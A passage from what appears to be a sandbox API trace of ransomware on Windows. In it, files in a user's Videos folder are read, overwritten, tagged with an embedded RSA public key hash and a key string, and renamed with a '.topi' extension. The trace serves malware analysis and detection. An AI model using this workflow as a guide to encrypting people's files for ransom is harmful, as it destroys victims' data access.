lpMem=0x316e958 | out: hHeap=0x680000) returned 1 [0099.105] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314df08 | out: hHeap=0x680000) returned 1 [0099.105] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9d48 | out: hHeap=0x680000) returned 1 [0099.105] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e1b68 | out: hHeap=0x680000) returned 1 [0099.105] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fb0 | out: hHeap=0x680000) returned 1 [0099.105] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e1970 | out: hHeap=0x680000) returned 1 [0099.105] WriteFile (in: hFile=0x6a8, lpBuffer=0x99fc2d8*, nNumberOfBytesToWrite=0x4e3a, lpNumberOfBytesWritten=0x9ccfb14, lpOverlapped=0x0 | out: lpBuffer=0x99fc2d8*, lpNumberOfBytesWritten=0x9ccfb14*=0x4e3a, lpOverlapped=0x0) returned 1 [0099.105] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99fc2d8 | out: hHeap=0x680000) returned 1 [0099.105] SetFilePointerEx (in: hFile=0x6a8, liDistanceToMove=0x4e3f, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0099.106] WriteFile (in: hFile=0x6a8, lpBuffer=0x99df068*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9ccfb50, lpOverlapped=0x0 | out: lpBuffer=0x99df068*, lpNumberOfBytesWritten=0x9ccfb50*=0x100, lpOverlapped=0x0) returned 1 [0099.106] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99df068 | out: hHeap=0x680000) returned 1 [0099.106] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316d8a8 [0099.106] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x428) returned 0x9a04420 [0099.106] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", cchWideChar=-1, lpMultiByteStr=0x9a04420, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", lpUsedDefaultChar=0x0) returned 41 [0099.106] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x430) returned 0x31d01f0 [0099.106] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x9a04420 | out: hHeap=0x680000) returned 1 [0099.106] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316d8a8 | out: hHeap=0x680000) returned 1 [0099.106] WriteFile (in: hFile=0x6a8, lpBuffer=0x31d01f0*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x9ccfb50, lpOverlapped=0x0 | out: lpBuffer=0x31d01f0*, lpNumberOfBytesWritten=0x9ccfb50*=0x28, lpOverlapped=0x0) returned 1 [0099.106] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d01f0 | out: hHeap=0x680000) returned 1 [0099.106] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0099.106] WriteFile (in: hFile=0x6a8, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9ccfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9ccfb50*=0x26, lpOverlapped=0x0) returned 1 [0099.107] CloseHandle (hObject=0x6a8) returned 1 [0099.108] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99df068 [0099.108] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x910) returned 0x3189d50 [0099.108] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99df068 | out: hHeap=0x680000) returned 1 [0099.108] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Yo5RRMrTBRvZPTzk\\z4k8sZRNNGS3Ve7W-\\sAsxhx217z\\sFJurkoQTJwuNyD54_K\\OfhU48bhc1pTaLoL1.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\yo5rrmrtbrvzptzk\\z4k8szrnngs3ve7w-\\sasxhx217z\\sfjurkoqtjwunyd54_k\\ofhu48bhc1ptalol1.avi"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Yo5RRMrTBRvZPTzk\\z4k8sZRNNGS3Ve7W-\\sAsxhx217z\\sFJurkoQTJwuNyD54_K\\OfhU48bhc1pTaLoL1.avi.topi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\yo5rrmrtbrvzptzk\\z4k8szrnngs3ve7w-\\sasxhx217z\\sfjurkoqtjwunyd54_k\\ofhu48bhc1ptalol1.avi.topi")) returned 1 [0099.109] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3189d50 | out: hHeap=0x680000) returned 1 [0099.109] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0099.109] VirtualFree (lpAddress=0x3750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0099.110] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ce620 | out: hHeap=0x680000) returned 1 [0099.110] FindNextFileW (in: hFindFile=0x31c7500, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x31ee00c0, ftCreationTime.dwHighDateTime=0x1d5c1f4, ftLastAccessTime.dwLowDateTime=0xfdd414d0, ftLastAccessTime.dwHighDateTime=0x1d5bd22, ftLastWriteTime.dwLowDateTime=0xfdd414d0, ftLastWriteTime.dwHighDateTime=0x1d5bd22, nFileSizeHigh=0x0, nFileSizeLow=0x698d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="S3Ct-Q.swf", cAlternateFileName="")) returned 1 [0099.110] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xd0) returned 0x99e8060 [0099.110] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x136) returned 0x31ce620 [0099.110] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e8060 | out: hHeap=0x680000) returned 1 [0099.110] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Yo5RRMrTBRvZPTzk\\z4k8sZRNNGS3Ve7W-\\sAsxhx217z\\sFJurkoQTJwuNyD54_K\\S3Ct-Q.swf") returned=".swf" [0099.110] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Yo5RRMrTBRvZPTzk\\z4k8sZRNNGS3Ve7W-\\sAsxhx217z\\sFJurkoQTJwuNyD54_K\\S3Ct-Q.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\yo5rrmrtbrvzptzk\\z4k8szrnngs3ve7w-\\sasxhx217z\\sfjurkoqtjwunyd54_k\\s3ct-q.swf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x6a8 [0099.110] GetFileSizeEx (in: hFile=0x6a8, lpFileSize=0x9ccfb40 | out: lpFileSize=0x9ccfb40*=27021) returned 1 [0099.110] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3750000 [0099.113] SetFilePointerEx (in: hFile=0x6a8, liDistanceToMove=0x6967, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0099.113] ReadFile (in: hFile=0x6a8, lpBuffer=0x3750000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9ccfb78, lpOverlapped=0x0 | out: lpBuffer=0x3750000*, lpNumberOfBytesRead=0x9ccfb78*=0x26, lpOverlapped=0x0) returned 1 [0099.114] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fe8 [0099.114] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0099.114] SetFilePointer (in: hFile=0x6a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0099.114] ReadFile (in: hFile=0x6a8, lpBuffer=0x3750000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9ccfb70, lpOverlapped=0x0 | out: lpBuffer=0x3750000*, lpNumberOfBytesRead=0x9ccfb70*=0x698d, lpOverlapped=0x0) returned 1 [0099.114] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0099.114] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f1) returned 0x31d5100 [0099.114] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0099.114] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0099.114] CryptAcquireContextW (in: phProv=0x9ccfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9ccfa50*=0x6df3c0) returned 1 [0099.115] CryptCreateHash (in: hProv=0x6df3c0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9ccfa58 | out: phHash=0x9ccfa58) returned 1 [0099.115] CryptHashData (hHash=0x31c7580, pbData=0x31d5100, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0099.115] CryptGetHashParam (in: hHash=0x31c7580, dwParam=0x2, pbData=0x0, pdwDataLen=0x9ccfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9ccfa54) returned 1 [0099.115] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x11) returned 0x314d0e8 [0099.115] CryptGetHashParam (in: hHash=0x31c7580, dwParam=0x2, pbData=0x314d0e8, pdwDataLen=0x9ccfa54, dwFlags=0x0 | out: pbData=0x314d0e8, pdwDataLen=0x9ccfa54) returned 1 [0099.115] GetLastError () returned 0x0 [0099.115] CryptDestroyHash (hHash=0x31c7580) returned 1 [0099.115] CryptReleaseContext (hProv=0x6df3c0, dwFlags=0x0) returned 1 [0099.115] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d5100 | out: hHeap=0x680000) returned 1 [0099.115] UuidCreate (in: Uuid=0x9ccfa48 | out: Uuid=0x9ccfa48) returned 0x0 [0099.115] UuidToStringA (in: Uuid=0x9ccfa48, StringUuid=0x9ccfa40 | out: StringUuid=0x9ccfa40) returned 0x0 [0099.115] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fb0 [0099.115] RpcStringFreeA (in: String=0x9ccfa40 | out: String=0x9ccfa40) returned 0x0 [0099.115] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0099.115] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fe8 [0099.115] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x6990) returned 0x9a06a00 [0099.116] SetFilePointer (in: hFile=0x6a8, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0099.116] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fb0 | out: hHeap=0x680000) returned 1 [0099.116] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f0) returned 0x99e1970 [0099.116] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fb0 [0099.116] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f0) returned 0x99e1b68 [0099.116] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x58) returned 0x99d9d48 [0099.116] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x99fc148 [0099.116] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e5210 [0099.116] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x99fc190 [0099.116] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e5228 [0099.116] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e5258 [0099.116] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4a30 [0099.116] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e5270 [0099.116] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x24) returned 0x31d4940 [0099.116] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x158) returned 0x9a04a18 [0099.116] RtlReAllocateHeap (Heap=0x680000, Flags=0x0, Ptr=0x9a04a18, Size=0x218) returned 0x99e8eb0 [0099.116] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x558) returned 0x9a04420 [0099.116] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e5258 | out: hHeap=0x680000) returned 1 [0099.116] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e5270 | out: hHeap=0x680000) returned 1 [0099.116] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4a30 | out: hHeap=0x680000) returned 1 [0099.116] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d4940 | out: hHeap=0x680000) returned 1 [0099.116] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x9a04420 | out: hHeap=0x680000) returned 1 [0099.116] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4a30 [0099.116] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e958 [0099.116] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99e5270 [0099.116] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x18) returned 0x314df08 [0099.116] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x9) returned 0x99e5258 [0099.116] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e998 [0099.116] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10e) returned 0x31b6350 [0099.116] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef928 [0099.116] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x58) returned 0x99d9e08 [0099.116] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314d0e8 [0099.117] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x104) returned 0x31919a8 [0099.117] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314d0a8 [0099.117] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e948 [0099.117] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b6350 | out: hHeap=0x680000) returned 1 [0099.117] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e5270 | out: hHeap=0x680000) returned 1 [0099.117] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e998 | out: hHeap=0x680000) returned 1 [0099.117] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e5258 | out: hHeap=0x680000) returned 1 [0099.117] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314df08 | out: hHeap=0x680000) returned 1 [0099.117] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e958 | out: hHeap=0x680000) returned 1 [0099.117] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4a30 | out: hHeap=0x680000) returned 1 [0099.117] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef928 | out: hHeap=0x680000) returned 1 [0099.117] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9d48 | out: hHeap=0x680000) returned 1 [0099.117] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e8eb0 | out: hHeap=0x680000) returned 1 [0099.117] GetCurrentThreadId () returned 0x8c4 [0099.117] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99df068 [0099.117] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x82) returned 0x99e3970 [0099.117] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x2c) returned 0x31c3f78 [0099.117] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6df3c0 [0099.117] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x148) returned 0x3112760 [0099.117] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e958 [0099.117] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e998 [0099.117] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99ded50 [0099.117] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0099.117] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0099.117] GetCurrentThreadId () returned 0x8c4 [0099.117] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0099.117] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0099.117] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xeb) returned 0x9a03438 [0099.117] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0099.117] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0099.117] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0099.117] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0099.117] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x9a03438 | out: hHeap=0x680000) returned 1 [0099.117] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99def60 [0099.117] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e958 | out: hHeap=0x680000) returned 1 [0099.117] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4c) returned 0x31cb988 [0099.117] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e958 [0099.117] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99deb40 [0099.118] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9d8 [0099.118] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4a30 [0099.118] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9d8 | out: hHeap=0x680000) returned 1 [0099.118] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9d8 [0099.118] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9f8 [0099.118] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e918 [0099.118] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9b8 [0099.118] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9a8 [0099.118] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e968 [0099.118] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9c8 [0099.118] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e5258 [0099.118] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9f8 | out: hHeap=0x680000) returned 1 [0099.118] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e9f8 [0099.118] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9d8 | out: hHeap=0x680000) returned 1 [0099.118] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9d8 [0099.118] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316ea08 [0099.118] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316ea18 [0099.118] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9e8 [0099.118] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e5270 [0099.118] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ea18 | out: hHeap=0x680000) returned 1 [0099.118] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314df08 [0099.118] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ea08 | out: hHeap=0x680000) returned 1 [0099.118] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e5240 [0099.118] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9e8 | out: hHeap=0x680000) returned 1 [0099.118] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e49d0 [0099.118] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9d8 | out: hHeap=0x680000) returned 1 [0099.118] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4a48 [0099.118] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e918 | out: hHeap=0x680000) returned 1 [0099.118] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4a18 [0099.118] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e968 | out: hHeap=0x680000) returned 1 [0099.118] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99e5288 [0099.118] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4a18 | out: hHeap=0x680000) returned 1 [0099.118] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99e4a18 [0099.118] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4a48 | out: hHeap=0x680000) returned 1 [0099.118] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e968 [0099.118] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e958 | out: hHeap=0x680000) returned 1 [0099.118] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314c608 [0099.118] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e968 | out: hHeap=0x680000) returned 1 [0099.118] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x18) returned 0x314c768 [0099.119] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e5258 | out: hHeap=0x680000) returned 1 [0099.119] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e5258 [0099.119] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9f8 | out: hHeap=0x680000) returned 1 [0099.119] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x204) returned 0x99e8eb0 [0099.119] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4a30 | out: hHeap=0x680000) returned 1 [0099.119] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x108) returned 0x3191cf0 [0099.119] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4a18 | out: hHeap=0x680000) returned 1 [0099.119] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x210) returned 0x99e9300 [0099.119] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314c768 | out: hHeap=0x680000) returned 1 [0099.119] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10c) returned 0x31b6350 [0099.119] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9b8 | out: hHeap=0x680000) returned 1 [0099.119] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x108) returned 0x3191bd8 [0099.119] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e5258 | out: hHeap=0x680000) returned 1 [0099.119] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x200) returned 0x31d5100 [0099.119] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3191cf0 | out: hHeap=0x680000) returned 1 [0099.119] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99dee58 [0099.119] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e998 | out: hHeap=0x680000) returned 1 [0099.119] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6df3c0 | out: hHeap=0x680000) returned 1 [0099.119] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99def60 | out: hHeap=0x680000) returned 1 [0099.119] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99dee58 | out: hHeap=0x680000) returned 1 [0099.119] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314c608 | out: hHeap=0x680000) returned 1 [0099.119] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3191bd8 | out: hHeap=0x680000) returned 1 [0099.119] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e9300 | out: hHeap=0x680000) returned 1 [0099.119] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d5100 | out: hHeap=0x680000) returned 1 [0099.119] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b6350 | out: hHeap=0x680000) returned 1 [0099.119] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9a8 | out: hHeap=0x680000) returned 1 [0099.119] HeapFree (in: hHeap=0x680000, 